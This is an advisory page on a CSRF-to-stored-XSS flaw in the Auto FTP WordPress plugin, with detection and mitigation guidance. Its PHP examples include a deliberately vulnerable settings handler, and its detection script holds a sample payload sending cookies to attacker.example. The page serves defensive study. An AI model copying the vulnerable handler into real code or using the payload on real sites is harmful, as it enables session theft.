CVE-2025-23793 Overview
CVE-2025-23793 is a Cross-Site Request Forgery (CSRF) vulnerability in the Ciprian Turcu Auto FTP WordPress plugin that leads to stored Cross-Site Scripting (XSS). The flaw affects all versions of Auto FTP up to and including 1.0.1. An attacker can craft a malicious request that, when triggered by an authenticated administrator visiting an attacker-controlled page, persists JavaScript payloads inside the plugin's configuration. The injected script executes in the browser of any user loading the affected admin view, enabling session theft, privilege abuse, or further site compromise. The weakness is classified as CWE-352.
Critical Impact
Successful exploitation lets an attacker who holds no credentials on the site plant persistent JavaScript in it, by tricking an authenticated administrator into visiting a page that submits the forged request; the stored payload then executes in the admin context on every subsequent load of the affected view.
Affected Products
- Ciprian Turcu Auto FTP WordPress plugin (auto-ftp)
- Versions from n/a through 1.0.1
- WordPress sites with the plugin installed and active
Discovery Timeline
- 2025-01-16 - CVE-2025-23793 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-23793
Vulnerability Analysis
The Auto FTP plugin exposes a state-changing administrative action without validating the request origin. The plugin does not enforce a WordPress nonce check or verify the Referer header on the handler that updates configuration values. An attacker hosts a page containing an auto-submitting form or fetch request targeting the plugin's settings endpoint. When an authenticated administrator visits the page, the browser sends authenticated cookies, and the request is processed as if it came from the admin.
The submitted parameters are stored in the plugin's options without sanitization or output encoding. Because the values are later rendered in the WordPress administrative interface, any injected <script> payload executes whenever an admin loads the affected page. This combination of CSRF and stored XSS escalates the impact beyond a simple cross-site forgery, because the payload becomes persistent and runs in a privileged context.
Root Cause
The root cause is missing CSRF protection on a privileged plugin action combined with absent input sanitization and output escaping. WordPress provides wp_nonce_field(), check_admin_referer(), and helpers such as sanitize_text_field() and esc_attr(). The plugin does not apply these controls on the affected settings handler, allowing forged submissions and persistence of unsanitized content.
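The two halves of that root cause side by side, as an added example (not Auto FTP's own code and not taken from the advisory): a settings handler that exhibits the bug class described above, followed by a hardened version that applies the WordPress helpers just named. The hook, function, option and field names (`autoftp_*`) and the settings-page slug are hypothetical, since the plugin's real identifiers are not documented on this page.

```php
<?php
/*
 * Added example (not Auto FTP's own code). The autoftp_* hook, function,
 * option and field names and the settings-page slug are hypothetical.
 */

/* ---- Vulnerable pattern --------------------------------------------------
 * Any request carrying an administrator's cookies reaches this code:
 * no capability check, no nonce check, raw input stored, raw value echoed.
 */
function autoftp_save_settings_vulnerable() {
    if ( isset( $_POST['autoftp_host'] ) ) {
        update_option( 'autoftp_host', $_POST['autoftp_host'] ); // unsanitized
    }
}

function autoftp_render_settings_vulnerable() {
    $host = get_option( 'autoftp_host', '' );
    // Unescaped: a stored value such as "><script>...</script> breaks out of the attribute.
    echo '<input type="text" name="autoftp_host" value="' . $host . '">';
}

/* ---- Hardened pattern ---------------------------------------------------- */
function autoftp_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'autoftp_save_settings', 'autoftp_nonce' ); ?>
        <input type="hidden" name="action" value="autoftp_save_settings">
        <input type="text" name="autoftp_host"
               value="<?php echo esc_attr( get_option( 'autoftp_host', '' ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

function autoftp_save_settings() {
    // 1. Authorization: only users allowed to manage options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // 2. CSRF check: dies unless autoftp_nonce is present and valid for this
    //    user and action. A page on another origin cannot read the nonce.
    check_admin_referer( 'autoftp_save_settings', 'autoftp_nonce' );

    // 3. Sanitize before persisting (WordPress slashes $_POST, hence wp_unslash).
    $host = isset( $_POST['autoftp_host'] )
        ? sanitize_text_field( wp_unslash( $_POST['autoftp_host'] ) )
        : '';
    update_option( 'autoftp_host', $host );

    // Hypothetical settings-page slug.
    wp_safe_redirect( admin_url( 'options-general.php?page=autoftp&updated=1' ) );
    exit;
}
// admin_post_* fires only for logged-in users; no admin_post_nopriv_* hook is registered.
add_action( 'admin_post_autoftp_save_settings', 'autoftp_save_settings' );
```

The three checks in the hardened handler are independent: the capability check stops low-privilege users, the nonce check stops forged cross-site submissions, and sanitization on input plus esc_attr() on output stops the stored payload from ever rendering as markup. Plugins that register their options through the Settings API (register_setting() with a sanitize_callback, submitting to options.php) get the nonce and capability handling from core, but still have to escape on output.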
Attack Vector
The attack is delivered over the network and requires user interaction from an authenticated administrator. The attacker prepares a malicious HTML page that issues a cross-origin POST to the plugin's settings endpoint with a JavaScript payload in a vulnerable field. When the admin visits the page, the request is processed with the admin's session, the payload is stored, and the XSS triggers on subsequent admin views. No attacker credentials are required. WordPress core does not set a SameSite attribute on its authentication cookies, so whether a given browser attaches them to a cross-site POST depends on that browser's default policy; treat the default as no protection.
Technical details are documented in the Patchstack advisory for the Auto FTP plugin.
Detection Methods for CVE-2025-23793
Indicators of Compromise
- Unexpected <script>, onerror=, or onload= content stored in Auto FTP plugin option values within the wp_options table
- Requests to plugin admin endpoints, authenticated with an administrator's session, whose Referer or Origin header names a domain other than the site's own
- New or modified administrator accounts, plugins, or themes created shortly after an admin viewed a plugin settings page
- Outbound requests from admin browsers to unfamiliar domains immediately after loading Auto FTP admin pages
Detection Strategies
- Audit wp_options rows associated with the auto-ftp plugin for HTML or JavaScript content
- Review web server access logs for POST requests to Auto FTP admin endpoints whose Referer or Origin header is not the site's own origin, or whose Sec-Fetch-Site header is cross-site (add these headers to the log format if they are not already recorded)
- Deploy a Content-Security-Policy-Report-Only header on /wp-admin/ to surface inline script execution; expect a noisy baseline, since WordPress core itself relies on inline scripts in the admin, and alert only on reports that deviate from it
- Correlate WordPress audit logs with browser-side telemetry to identify admin sessions that triggered unexpected script execution
Monitoring Recommendations
- Enable a WordPress activity log plugin to record option changes and plugin setting updates
- Alert on POST requests to plugin administrative endpoints that arrive without a nonce parameter (_wpnonce or the plugin's own field); log inspection can establish only that a nonce is present, not that it is valid, but a forged request from another origin will not carry one at all
- Monitor for stored values containing event handler attributes or <script> tags across plugin option rows
- Track administrator browser sessions for anomalous outbound connections following access to plugin settings
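The option-row checks listed above, as an added detection example (not part of the plugin, the advisory, or this page's original content). The function scans option rows for stored-XSS markers and returns the hits; run stand-alone it uses constructed sample rows, and run inside WordPress (for example with wp eval-file) it reads live rows through $wpdb. The option-name prefix auto_ftp is an assumption; read the plugin's source for the real one.

```php
<?php
/*
 * Added detection example (not Auto FTP or Patchstack code). Stand-alone it
 * scans the constructed sample rows below; under "wp eval-file scan.php" it
 * scans the live options table. The 'auto_ftp' prefix is an assumption.
 */

const AUTOFTP_OPTION_PREFIX = 'auto_ftp';

// Markers that have no business in a plugin's configuration values. Option
// values are often PHP-serialized arrays; matching the raw string still works.
const XSS_MARKER_PATTERN =
    '/<\s*script\b|<\s*\/?\s*(iframe|svg|object|embed|img)\b|javascript\s*:|\bon[a-z]+\s*=|&lt;\s*script/i';

// Minimal serialized-string test so the script does not depend on WordPress' is_serialized().
function is_serialized_value( string $v ): bool {
    return $v === 'N;' || (bool) preg_match( '/^(?:[aOs]:\d+:|[bid]:)/', $v );
}

/**
 * @param array $rows each ['option_name' => string, 'option_value' => string]
 * @return array flagged rows: option_name, the marker that matched, and the
 *               value (unserialized when it was a serialized array)
 */
function find_suspicious_options( array $rows ): array {
    $hits = [];
    foreach ( $rows as $row ) {
        if ( preg_match( XSS_MARKER_PATTERN, $row['option_value'], $m ) ) {
            $hits[] = [
                'option_name' => $row['option_name'],
                'marker'      => $m[0],
                'value'       => is_serialized_value( $row['option_value'] )
                    ? unserialize( $row['option_value'], [ 'allowed_classes' => false ] )
                    : $row['option_value'],
            ];
        }
    }
    return $hits;
}

if ( isset( $GLOBALS['wpdb'] ) ) {
    // Inside WordPress: pull the plugin's real rows (prefix is an assumption).
    global $wpdb;
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT option_name, option_value FROM {$wpdb->options} WHERE option_name LIKE %s",
            $wpdb->esc_like( AUTOFTP_OPTION_PREFIX ) . '%'
        ),
        ARRAY_A
    );
} else {
    // Constructed sample rows: one benign, one serialized array carrying a
    // script payload, one carrying an event-handler attribute.
    $rows = [
        [ 'option_name' => 'auto_ftp_host', 'option_value' => 'ftp.example.net' ],
        [ 'option_name' => 'auto_ftp_settings',
          'option_value' => serialize( [
              'path'  => '/uploads',
              'label' => '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
          ] ) ],
        [ 'option_name' => 'auto_ftp_note', 'option_value' => '<img src=x onerror=alert(1)>' ],
    ];
}

foreach ( find_suspicious_options( $rows ) as $hit ) {
    printf( "SUSPECT %s (matched %s): %s\n",
        $hit['option_name'], $hit['marker'], json_encode( $hit['value'] ) );
}
```

On the sample rows the benign host passes and the other two are reported, the serialized one with its array expanded so the offending field is visible. Unserializing with allowed_classes set to false keeps a tampered value from instantiating objects during the audit. Scope the prefix to the plugin under review: options such as widget text legitimately contain HTML and would otherwise flood the results.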
How to Mitigate CVE-2025-23793
Immediate Actions Required
- Deactivate and remove the Auto FTP plugin until a patched release is available and verified; the advisory lists no fixed version, and every release through 1.0.1 is affected
- Rotate WordPress administrator passwords and invalidate active sessions to remove any credentials potentially harvested via XSS
- Inspect wp_options entries created by the plugin and remove any rows containing script or event-handler content
- Review user accounts, scheduled tasks, and installed plugins for unauthorized additions
Patch Information
No fixed version is listed in the advisory; the vulnerability affects Auto FTP from n/a through 1.0.1. Site operators should monitor the Patchstack advisory and the plugin's repository for an updated release that adds nonce verification and input sanitization.
Workarounds
- Remove the Auto FTP plugin entirely if it is not required for site operations
- Placing WordPress administrative endpoints behind IP allowlisting or VPN-only access limits who can reach them, but it does not stop this attack by itself: the forged request is sent by the administrator's own browser from an already-allowed address. It helps only when administrators connect to the VPN solely for the duration of administrative work
- Deploy a web application firewall rule that blocks POST requests to the plugin's settings endpoint when no nonce parameter (_wpnonce or the plugin's own field) is present; the WAF can check only presence, not validity, but a forged cross-site request will not carry a nonce at all. Test before extending such a rule to all of /wp-admin/, where it can break legitimate functionality
- Train administrators to log out of WordPress before browsing untrusted sites and to use a dedicated browser profile for administration
# Workaround via WP-CLI. Audit the stored options BEFORE deleting the plugin:
# a plugin's uninstall routine may remove its own options and destroy the evidence.
# The table name is built from the configured prefix rather than assuming wp_.
wp db query "SELECT option_name, option_value FROM $(wp config get table_prefix)options WHERE option_value LIKE '%<script%' OR option_value LIKE '%onerror=%' OR option_value LIKE '%onload=%' OR option_value LIKE '%javascript:%';"
# Then disable and remove the vulnerable plugin
wp plugin deactivate auto-ftp
wp plugin delete auto-ftp
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.